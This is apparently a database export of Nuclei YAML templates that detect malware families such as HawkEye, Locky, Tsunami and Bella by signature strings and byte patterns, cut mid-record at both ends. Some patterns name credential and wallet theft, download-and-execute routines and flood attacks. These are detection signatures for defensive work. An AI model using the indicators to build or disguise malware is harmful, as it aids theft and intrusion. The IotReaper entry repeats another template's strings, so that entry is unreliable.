\"Stroks\"\n - \"Avenger by NhT\"\n - \"####@####\"\n - \"GREAME\"\n condition: and\n\n - type: binary\n binary:\n - \"232323234023232323E8EEE9F9232323234023232323\"\n - \"232323234023232323FAFDF0EFF9232323234023232323\"\n condition: and\n\n# digest: 490a004630440220033cb352a6c026a34645d20c297b5c3ea9243c1d98830fc03c61e0b633f085e102201e7ec4e2892ccaf6dcacfae3b5395acb8dd0da6311a4caa0373e67014d681af1:922c64590222798bb761d5b6d8e72950\n", "hash": "47f22ed42161c55ae70ed399fb9a51c7", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307da0" }, "name": "grozlex-malware.yaml", "content": "id: grozlex-malware\n\ninfo:\n name: Grozlex Malware - Detect\n author: daffainfo\n severity: info\n reference:\n - https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html\n - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Grozlex.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - 
type: binary\n binary:\n - \"4C006F00670073002000610074007400610063006800650064002000620079002000690043006F007A0065006E\"\n\n# digest: 4b0a00483046022100b2982d797690c09fbb5a52a4acd50c97065486d840366ebe849db40f091a051a022100b320ef03f51e8f1a2dab81c0591e69900e265252316c08f0711442b99f12650b:922c64590222798bb761d5b6d8e72950\n", "hash": "5dd4800dcc34e6d881a46a43fb22d316", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307da1" }, "name": "hawkeye-malware.yaml", "content": "id: hawkeye-malware\n\ninfo:\n name: HawkEye Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"HawkEyeKeylogger\"\n - \"099u787978786\"\n - \"HawkEye_Keylogger\"\n - \"holdermail.txt\"\n - \"wallet.dat\"\n - \"Keylog Records\"\n - \"\"\n - \"\\\\pidloc.txt\"\n - \"BSPLIT\"\n condition: and\n\n# digest: 4a0a004730450221009d0d74bbb3d7f02cd3e3f6f0b539b399ccf1b22147a164d8bcddd5fabdc5c54c02202f69f83003e25a2a80e7755f4048d6f34278c80ce5aacb40d25c177948161cd6:922c64590222798bb761d5b6d8e72950\n", "hash": "021341510ca420e5334301b34c4986cd", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307da2" }, "name": "hydracrypt-malware.yaml", "content": "id: ransomware_windows_hydracrypt\n\ninfo:\n name: Hydracrypt Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/ransomware/windows/ransomware_windows_hydracrypt.yara\n tags: malware,file,hydracrypt\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"oTraining\"\n - \"Stop Training\"\n - \"Play \\\"sound.wav\\\"\"\n - \"&Start Recording\"\n - \"7About record\"\n condition: and\n\n# digest: 
4a0a004730450220408bdc9a1276d1da11b112f8fbd617c84176a4a4c239a3669f2cd26ed6d9a1aa022100c8c051a81f80c4eca9ee7ef902bb5336a9d79bcccb991e35aa4dfd533e5dbb03:922c64590222798bb761d5b6d8e72950\n", "hash": "1efe62aa850b97074cefc8704554cca1", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307da3" }, "name": "imminent-malware.yaml", "content": "id: imminent-malware\n\ninfo:\n name: Imminent Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: or\n matchers:\n - type: word\n part: raw\n words:\n - \"DecodeProductKey\"\n - \"StartHTTPFlood\"\n - \"CodeKey\"\n - \"MESSAGEBOX\"\n - \"GetFilezillaPasswords\"\n - \"DataIn\"\n - \"UDPzSockets\"\n condition: and\n\n - type: word\n part: raw\n words:\n - \"k__BackingField\"\n - \"k__BackingField\"\n - \"DownloadAndExecute\"\n - \"england.png\"\n - \"-CHECK & PING -n 2 127.0.0.1 & EXIT\"\n - \"Showed Messagebox\"\n condition: and\n\n# digest: 4a0a0047304502206e2f6dc27e1c37ff961d32317adaa25228ebc6996fe5bc91b0e2cdff3c5bee57022100b72c085e7b2c4bef399e91106089e1f999df023718d984781d37a80974c42b41:922c64590222798bb761d5b6d8e72950\n", "hash": "ad195f9e405b9fc4956c868093425c76", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307da4" }, "name": "infinity-malware.yaml", "content": "id: infinity-malware\n\ninfo:\n name: Infinity Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"CRYPTPROTECT_PROMPTSTRUCT\"\n - \"discomouse\"\n - \"GetDeepInfo\"\n - \"AES_Encrypt\"\n - \"StartUDPFlood\"\n - \"BATScripting\"\n - \"FBqINhRdpgnqATxJ.html\"\n - \"magic_key\"\n condition: and\n\n# digest: 
490a0046304402206e7b4d78d5bef2155ee5f2c63a83a5b744fa98a1a5d8da69cabd566de79dc17b022017ce798b08acdf07a11c2949bcf220b510955c404d383bfa3b32b998ac20663e:922c64590222798bb761d5b6d8e72950\n", "hash": "701eb08d7c7202c49b8d2ee15e8efda8", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307da5" }, "name": "insta11-malware.yaml", "content": "id: insta11-malware\n\ninfo:\n name: Insta11 Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Install11.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: or\n matchers:\n - type: word\n part: raw\n words:\n - 'XTALKER7'\n - 'Insta11 Microsoft'\n - 'wudMessage'\n - 'ECD4FC4D-521C-11D0-B792-00A0C90312E1'\n - 'B12AE898-D056-4378-A844-6D393FE37956'\n condition: or\n\n - type: binary\n binary:\n - 'E9000000006823040000'\n\n# digest: 4a0a00473045022100887f3b0bb545f5a3710ed0e8ea19c1ce2ae9d7e8ba5af80161713d098c780019022038488e87fe95df609cff973f6771b681bbb74de4bbeee489a9af535c7cee7b02:922c64590222798bb761d5b6d8e72950\n", "hash": "fb4fde185db128f9f7967b9bc4c86ebe", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307da6" }, "name": "intel-virtualization-malware.yaml", "content": "id: intel-virtualization-malware\n\ninfo:\n name: Intel Virtualization Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Intel_Virtualization.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: and\n matchers:\n - type: binary\n binary:\n - '4C6F6164535452494E47'\n - '496E697469616C697A654B6579486F6F6B'\n - '46696E645265736F7572636573'\n - '4C6F6164535452494E4746726F6D484B4355'\n - '6863637574696C732E444C4C'\n condition: and\n\n - type: binary\n binary:\n - '483A5C466173745C506C756728686B636D64295C'\n - '646C6C5C52656C656173655C48696A61636B446C6C2E706462'\n condition: and\n\n# digest: 
490a00463044022013d609856dcbea597a8972ccf79c7efbaf74a453066aa09f49f30de2d3ca41af022047495390e0f0cff609552ada8a7e3c8310f2bfb9322a392bbdd64db5f2140688:922c64590222798bb761d5b6d8e72950\n", "hash": "6682b41faa405451da546ab87888954f", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307da7" }, "name": "iotreaper-malware.yaml", "content": "id: iotreaper-malware\n\ninfo:\n name: IotReaper Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_IotReaper.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: or\n matchers:\n - type: word\n part: raw\n words:\n - 'XTALKER7'\n - 'Insta11 Microsoft'\n - 'wudMessage'\n - 'ECD4FC4D-521C-11D0-B792-00A0C90312E1'\n - 'B12AE898-D056-4378-A844-6D393FE37956'\n condition: or\n\n - type: binary\n binary:\n - 'E9000000006823040000'\n\n# digest: 4b0a00483046022100a92e0d01290662c6df6dc19b0f7d8dfb6cff192d7d779be40d4f4e538f28ef50022100ce06cbcf7a991b388572bcb400f680ae7af390620f3582d1586521b16fcc33ae:922c64590222798bb761d5b6d8e72950\n", "hash": "1feccac6561e66ac7a4d005869f18b68", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307da8" }, "name": "linux-aesddos-malware.yaml", "content": "id: linux-aesddos-malware\n\ninfo:\n name: Linux AESDDOS Malware - Detect\n author: daffainfo\n severity: info\n reference:\n - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Miscelanea_Linux.yar\n - http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: or\n matchers:\n - type: word\n part: raw\n words:\n - \"3AES\"\n - \"Hacker\"\n condition: and\n\n - type: word\n part: raw\n words:\n - \"3AES\"\n - \"VERSONEX\"\n condition: and\n\n - type: word\n part: raw\n words:\n - \"VERSONEX\"\n - \"Hacker\"\n condition: and\n\n# digest: 
4a0a004730450221008d57442ef7f0c57e396e937805feb8e7629e470ef5ce511508a258d40756890802203363c538dea5383a8ffc67ade97c616ad2411d496a1291022fc606d4d51ae3ab:922c64590222798bb761d5b6d8e72950\n", "hash": "62a65b62adb6a00b0b087b016e182de9", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307da9" }, "name": "linux-billgates-malware.yaml", "content": "id: linux-billgates-malware\n\ninfo:\n name: Linux BillGates Malware - Detect\n author: daffainfo\n severity: info\n reference:\n - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Miscelanea_Linux.yar\n - http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3429\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"12CUpdateGates\"\n - \"11CUpdateBill\"\n condition: and\n\n# digest: 4a0a00473045022100c5a56518759e09696fefe13a0b1d3e8c20486aa77b4054d125de1a64e6b85837022048802bd37744af7ab8b8d6ee87f166f72fb7540071fc1fa66d6758f8ec308ec1:922c64590222798bb761d5b6d8e72950\n", "hash": "666f5e762387e1754112ea517b7f9f20", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307daa" }, "name": "linux-elknot-malware.yaml", "content": "id: linux-elknot-malware\n\ninfo:\n name: Linux Elknot Malware - Detect\n author: daffainfo\n severity: info\n reference:\n - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Miscelanea_Linux.yar\n - http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3099\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"ZN8CUtility7DeCryptEPciPKci\"\n - \"ZN13CThreadAttack5StartEP11CCmdMessage\"\n condition: and\n\n# digest: 4b0a00483046022100afe801591518f61980e306df3239458666a21c5efadc7b0aa21c2a37a6f4389402210090d3fcaaafb407164a8e9a1b0374ef7defe960239f59ca36767f19d0e2d72a6d:922c64590222798bb761d5b6d8e72950\n", "hash": "844dc78b2d9fabf166acea63c1ae98fb", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": 
"66477a413521042ccf307dab" }, "name": "linux-mrblack-malware.yaml", "content": "id: linux-mrblack-malware\n\ninfo:\n name: Linux MrBlack Malware - Detect\n author: daffainfo\n severity: info\n reference:\n - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Miscelanea_Linux.yar\n - http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"Mr.Black\"\n - \"VERS0NEX:%s|%d|%d|%s\"\n condition: and\n\n# digest: 4b0a00483046022100e7fcb47da01265dc6d82c988665412c3c254057857d7f60e165d3b62f7e446b5022100ee15cc6c71013da15b49ef559d53b3d02d14175a0dfdfb59a251661311801bdd:922c64590222798bb761d5b6d8e72950\n", "hash": "0a064b506ceb75808ebead1ae1b12916", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dac" }, "name": "linux-tsunami-malware.yaml", "content": "id: linux-tsunami-malware\n\ninfo:\n name: Linux Tsunami Malware - Detect\n author: daffainfo\n severity: info\n reference:\n - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Miscelanea_Linux.yar\n - http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"PRIVMSG %s :[STD]Hitting %s\"\n - \"NOTICE %s :TSUNAMI \"\n - \"NOTICE %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually.\"\n\n# digest: 4a0a00473045022100b11e27e928e15e29276bad4b6c854bbac5c038ff4512449811a96c4008091e19022071292b63947f8670739933a7262c9ccfc954f74c637aad2c04f3a62857c325f9:922c64590222798bb761d5b6d8e72950\n", "hash": "9da0269b57fa55e60e80f1e349e5b122", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dad" }, "name": "locky-malware.yaml", "content": "id: locky-malware\n\ninfo:\n name: Locky Malware - Detect\n author: daffainfo\n severity: info\n reference: 
https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_Locky.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: or\n matchers:\n - type: binary\n binary:\n - \"45b899f7f90faf45b88945b8\"\n - \"2b0a0faf4df8894df8c745\"\n condition: and\n\n - type: binary\n binary:\n - \"2E006C006F0063006B00790000\"\n - \"005F004C006F0063006B007900\"\n - \"5F007200650063006F00760065\"\n - \"0072005F0069006E0073007400\"\n - \"720075006300740069006F006E\"\n - \"0073002E0074007800740000\"\n - \"536F6674776172655C4C6F636B7900\"\n condition: and\n\n# digest: 4a0a0047304502207bf92252439de1c81b481ccc04452a42adaef5b2709cf230dfa77e1bbb0ee747022100918bbd08a177c897bd1a6e5174517e50bd150780bd831df32d7f5683d6ecbabe:922c64590222798bb761d5b6d8e72950\n", "hash": "2a430da20053672a5f7aabb308885e84", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dae" }, "name": "lostdoor-malware.yaml", "content": "id: lostdoor-malware\n\ninfo:\n name: LostDoor Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: and\n matchers:\n - type: word\n part: raw\n words:\n - \"*mlt* = %\"\n - \"*ip* = %\"\n - \"*victimo* = %\"\n - \"*name* = %\"\n - \"[START]\"\n - \"[DATA]\"\n - \"We Control Your Digital World\"\n - \"RC4Initialize\"\n - \"RC4Decrypt\"\n condition: and\n\n - type: binary\n binary:\n - \"0D0A2A454449545F5345525645522A0D0A\"\n\n# digest: 4a0a00473045022100f09b93e1cf30aeda8bdc4f1fe11328677f25778c788801f45f4a4a84546777bc02202dd9af3a65aa9435d840b2c25b19d4e32d7455f1549bff53adf7538a5532fed2:922c64590222798bb761d5b6d8e72950\n", "hash": "b53f65bd1b935f800827b0497f3c4e86", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307daf" }, "name": "luminositylink-malware.yaml", "content": "id: luminositylink-malware\n\ninfo:\n name: LuminosityLink Malware 
- Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"SMARTLOGS\"\n - \"RUNPE\"\n - \"b.Resources\"\n - \"CLIENTINFO*\"\n - \"Invalid Webcam Driver Download URL, or Failed to Download File!\"\n - \"Proactive Anti-Malware has been manually activated!\"\n - \"REMOVEGUARD\"\n - \"C0n1f8\"\n - \"Luminosity\"\n - \"LuminosityCryptoMiner\"\n - \"MANAGER*CLIENTDETAILS*\"\n condition: and\n\n# digest: 490a004630440220014ac277fc402a628e9185fe0e76a351be65603be58b48a2c02cbdface53903e0220363eca2d5743b2c8e61fbb485e325d04ffe864d9fae151cbb0217c2d7947d111:922c64590222798bb761d5b6d8e72950\n", "hash": "79e29bceedbce19caba9dda074af1683", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307db0" }, "name": "luxnet-malware.yaml", "content": "id: luxnet-malware\n\ninfo:\n name: LuxNet Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"GetHashCode\"\n - \"Activator\"\n - \"WebClient\"\n - \"op_Equality\"\n - \"dickcursor.cur\"\n - \"{0}|{1}|{2}\"\n condition: and\n\n# digest: 4a0a0047304502210091a15227939391bbbb1ff990efe1986b5cee3a1d222ef86e8d87c70d05cfa30e0220328b29c901b6de0f8c662a0c0ae3aa1948899b7ec24346c6679f1c9838b24e60:922c64590222798bb761d5b6d8e72950\n", "hash": "8bf6b30d28ea7ce6ea190a224a26525f", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307db1" }, "name": "macgyver-installer-malware.yaml", "content": "id: macgyver-installer-malware\n\ninfo:\n name: MacGyver.cap Installer Malware - Detect\n author: daffainfo\n severity: info\n reference:\n - 
https://github.com/fboldewin/MacGyver-s-return---An-EMV-Chip-cloning-case/blob/master/MacGyver's%20return%20-%20An%20EMV%20Chip%20cloning%20case.pdf\n - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_MacGyver.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"delete -AID 315041592e5359532e4444463031\"\n - \"install -file MacGyver.cap -nvDataLimit 1000 -instParam 00 -priv 4\"\n - \"-mac_key 404142434445464748494a4b4c4d4e4f\"\n - \"-enc_key 404142434445464748494a4b4c4d4e4f\"\n condition: and\n\n# digest: 490a0046304402203ec0c760923b78ea7ff2bbbbbbb5d20673c1d5c924bc45ad0586320831f2609e02207df6edc08b4f88db4f1b710d1037086d5ef37a0cf0e0c4348ce69cfb4d6e5fb9:922c64590222798bb761d5b6d8e72950\n", "hash": "b25b01523c2866db347d464b495a8c5e", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307db2" }, "name": "macgyver-malware.yaml", "content": "id: macgyver-malware\n\ninfo:\n name: MacGyver.cap Malware - Detect\n author: daffainfo\n severity: info\n reference:\n - https://github.com/fboldewin/MacGyver-s-return---An-EMV-Chip-cloning-case/blob/master/MacGyver's%20return%20-%20An%20EMV%20Chip%20cloning%20case.pdf\n - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_MacGyver.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"src/MacGyver/javacard/Header.cap\"\n - \"src/MacGyver/javacard/Directory.cap\"\n - \"src/MacGyver/javacard/Applet.cap\"\n - \"src/MacGyver/javacard/Import.cap\"\n - \"src/MacGyver/javacard/ConstantPool.cap\"\n - \"src/MacGyver/javacard/Class.cap\"\n - \"src/MacGyver/javacard/Method.cap\"\n condition: and\n\n# digest: 490a00463044022047afeb1e4cf0d671f015f766751963babcaa994464a7cd807161f6cc53f9f85702205ea23d159f7c5f930e8ac99992c1e81b82bc58fa7bf50481168e325861e4667d:922c64590222798bb761d5b6d8e72950\n", "hash": "a5c8b4bc23918f0e4609e66f817e8022", "level": 2, "time": "2024-05-17 23:39:44" }, 
{ "_id": { "$oid": "66477a413521042ccf307db3" }, "name": "macos-bella-malware.yaml", "content": "id: macos-bella-malware\n\ninfo:\n name: Bella Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/malware/macos/malware_macos_bella.yara\n tags: malware,file,macos-bella\nfile:\n - extensions:\n - all\n\n matchers-condition: or\n matchers:\n - type: word\n part: raw\n words:\n - \"Verified! [2FV Enabled] Account ->\"\n - \"There is no root shell to perform this command. See [rooter] manual entry.\"\n - \"Attempt to escalate Bella to root through a variety of attack vectors.\"\n - \"BELLA IS NOW RUNNING. CONNECT TO BELLA FROM THE CONTROL CENTER.\"\n condition: or\n\n - type: word\n part: raw\n words:\n - \"user_pass_phish\"\n - \"bella_info\"\n - \"get_root\"\n condition: and\n\n - type: word\n part: raw\n words:\n - \"Please specify a bella server.\"\n - \"What port should Bella connect on [Default is 4545]:\"\n condition: and\n\n# digest: 490a00463044022020ad29e486e7bd8f7024226d48a543032ac746afc8e929c68a189b2c3d312b9a02207489384ec2fcb05068a934ad391a9fcbdae8d9b1774000a5d2a643b12a2cd62a:922c64590222798bb761d5b6d8e72950\n", "hash": "3fa425f55144c729bd1d0f328271b175", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307db4" }, "name": "madness-malware.yaml", "content": "id: madness-malware\n\ninfo:\n name: Madness DDOS Malware - Detect\n author: daffainfo\n severity: info\n reference:\n - https://github.com/arbor/yara/blob/master/madness.yara\n - https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Madness.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"TW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNS4xOyBlbi1VUzsgcnY6MS44LjAuNSkgR2Vja28vMjAwNjA3MzEgRmlyZWZveC8xLjUuMC41IEZsb2NrLzAuNy40LjE\"\n - 
\"TW96aWxsYS81LjAgKFgxMTsgVTsgTGludXggMi40LjItMiBpNTg2OyBlbi1VUzsgbTE4KSBHZWNrby8yMDAxMDEzMSBOZXRzY2FwZTYvNi4wMQ==\"\n - \"document.cookie=\"\n - \"[\\\"cookie\\\",\\\"\"\n - \"\\\"realauth=\"\n - \"\\\"location\\\"];\"\n - \"d3Rm\"\n - \"ZXhl\"\n condition: and\n\n# digest: 4a0a00473045022051f792d8fdfa305d5ab2037587778ab229d5024acc9068cb70f9980f11828e97022100c9fce5325c0373eff3477acb6ccdd1ef1e360f5382eb2bbb281a28a498d49aa3:922c64590222798bb761d5b6d8e72950\n", "hash": "4b0ab8d5af60971d971f594b25428b9b", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307db5" }, "name": "miner--malware.yaml", "content": "id: miner-malware\n\ninfo:\n name: Miner Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_XMRIG_Miner.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"stratum+tcp\"\n - \"stratum+udp\"\n\n# digest: 4a0a004730450220758248e479cc75a3a72cefbf3bd119a3c5a563b6e07281190431672114422cdc022100a164b67ed1b7ac223929521b51140f31f6d0ccb57dfd9f9618fb4fffbcbeeabc:922c64590222798bb761d5b6d8e72950\n", "hash": "8b5fa076e1caa712bb4c17f97c6b472c", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307db6" }, "name": "miniasp3-malware.yaml", "content": "id: miniasp3-malware\n\ninfo:\n name: MiniASP3 Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_MiniAsp3_mem.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: or\n matchers:\n - type: word\n part: raw\n words:\n - \"MiniAsp3\\\\Release\\\\MiniAsp.pdb\"\n - \"http://%s/about.htm\"\n - \"http://%s/result_%s.htm\"\n - \"open internet failed…\"\n condition: and\n\n - type: word\n part: raw\n words:\n - \"MiniAsp3\\\\Release\\\\MiniAsp.pdb\"\n - \"http://%s/about.htm\"\n - \"http://%s/result_%s.htm\"\n - \"run error!\"\n condition: 
and\n\n - type: word\n part: raw\n words:\n - \"MiniAsp3\\\\Release\\\\MiniAsp.pdb\"\n - \"http://%s/about.htm\"\n - \"http://%s/result_%s.htm\"\n - \"run ok!\"\n condition: and\n\n - type: word\n part: raw\n words:\n - \"MiniAsp3\\\\Release\\\\MiniAsp.pdb\"\n - \"http://%s/about.htm\"\n - \"http://%s/result_%s.htm\"\n - \"time out,change to mode 0\"\n condition: and\n\n - type: word\n part: raw\n words:\n - \"MiniAsp3\\\\Release\\\\MiniAsp.pdb\"\n - \"http://%s/about.htm\"\n - \"http://%s/result_%s.htm\"\n - \"command is null!\"\n condition: and\n\n# digest: 4a0a00473045022100ec2ad4687e5402163e990ddb3e723d4fb30ad0a17b153eee6b4e6b4c7ce8d491022033512c2d600df63f943c3fa8cca3baee7078317444395edf1b8413d3de12f1bc:922c64590222798bb761d5b6d8e72950\n", "hash": "4494383641513daac940920a1b26a823", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307db7" }, "name": "naikon-malware.yaml", "content": "id: naikon-malware\n\ninfo:\n name: Naikon Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Naikon.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: or\n matchers:\n - type: binary\n binary:\n - \"0FAFC1C1E01F\"\n - \"355A010000\"\n - \"81C27F140600\"\n condition: and\n\n - type: word\n part: raw\n words:\n - \"NOKIAN95/WEB\"\n - \"/tag=info&id=15\"\n - \"skg(3)=&3.2d_u1\"\n - \"\\\\Temp\\\\iExplorer.exe\"\n - \"\\\\Temp\\\\\\\"TSG\\\"\"\n condition: or\n\n# digest: 4a0a0047304502207f942d475af9fbeddcd2f52d61e40cf86505078196c46b7e2764e8261194f31302210092b2c2f39c63e4c41913d29dd5c5f9f9378002c2a629ecabb3193e2c30d6e5f5:922c64590222798bb761d5b6d8e72950\n", "hash": "7ca34b5d5dd5c6e99fc02b03cf4744f9", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307db8" }, "name": "naspyupdate-malware.yaml", "content": "id: naspyupdate-malware\n\ninfo:\n name: nAspyUpdate Malware - Detect\n author: daffainfo\n severity: info\n 
reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Naspyupdate.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: or\n matchers:\n - type: binary\n binary:\n - \"8A5424148A0132C202C28801414E75F4\"\n\n - type: word\n part: raw\n words:\n - \"\\\\httpclient.txt\"\n - \"password <=14\"\n - \"/%ldn.txt\"\n - \"Kill You\\0\"\n condition: or\n\n# digest: 4b0a00483046022100a2a187bf7ef145fa334d95e0fddb1ccc02e4ae08f3f2f3737b415e180c6676a00221009244a5e76521882af8be71097a9b2bb6e6280decac6bb4b8b7e338a5da3eaa1c:922c64590222798bb761d5b6d8e72950\n", "hash": "56924930bc4b61e3380a0bc58e967774", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307db9" }, "name": "notepad-malware.yaml", "content": "id: notepad-malware\n\ninfo:\n name: Notepad v1.1 Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Notepad.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"75BAA77C842BE168B0F66C42C7885997\"\n - \"B523F63566F407F3834BCC54AAA32524\"\n\n# digest: 490a004630440220585a7e0714a199acc0a4b82b123259924032a0ecd218e03ca29509d6f5b7df200220313be0feccb7edd003a682a4e55e4ff1eb1ed40e6909ce5337a4c3cb5bda0854:922c64590222798bb761d5b6d8e72950\n", "hash": "e2d3e177a81f1b84354e592e5fbebf9f", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dba" }, "name": "olyx-malware.yaml", "content": "id: olyx-malware\n\ninfo:\n name: Olyx Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Olyx.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: or\n matchers:\n - type: word\n part: raw\n words:\n - \"/Applications/Automator.app/Contents/MacOS/DockLight\"\n condition: or\n\n - type: binary\n binary:\n - \"C7400436363636C7400836363636\"\n - 
